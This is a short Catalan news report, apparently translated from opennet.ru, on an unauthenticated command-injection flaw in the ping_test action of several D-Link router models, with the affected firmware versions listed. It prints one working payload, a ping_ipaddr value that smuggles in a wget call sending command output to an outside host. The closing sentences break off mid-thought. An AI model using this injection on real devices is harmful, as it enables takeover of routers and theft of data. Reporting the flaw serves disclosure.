En els encaminadors sense fil D-Link
Curiosament, segons els desenvolupadors del microprogramari, la crida "ping_test" només s'ha d'executar després de l'autenticació, però en realitat s'anomena en qualsevol cas, independentment d'iniciar sessió a la interfície web. En particular, quan s'accedeix a l'script apply_sec.cgi i es passa el paràmetre “action=ping_test”, l'script redirigeix a la pàgina d'autenticació, però al mateix temps realitza l'acció associada a ping_test. Per executar el codi, es va utilitzar una altra vulnerabilitat al mateix ping_test, que crida a la utilitat ping sense comprovar correctament la correcció de l'adreça IP enviada per a la prova. Per exemple, per trucar a la utilitat wget i transferir els resultats de l'ordre "echo 1234" a un host extern, només cal que especifiqueu el paràmetre "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( echo 1234)".
La presència de la vulnerabilitat s'ha confirmat oficialment en els models següents:
- DIR-655 amb firmware 3.02b05 o anterior;
- DIR-866L amb firmware 1.03b04 o anterior;
- DIR-1565 amb firmware 1.01 o anterior;
- DIR-652 (no es proporciona informació sobre les versions de microprogramari problemàtiques)
El període de suport per a aquests models ja ha expirat, així que D-Link
Més tard es va descobrir que la vulnerabilitat també ho era
Font: opennet.ru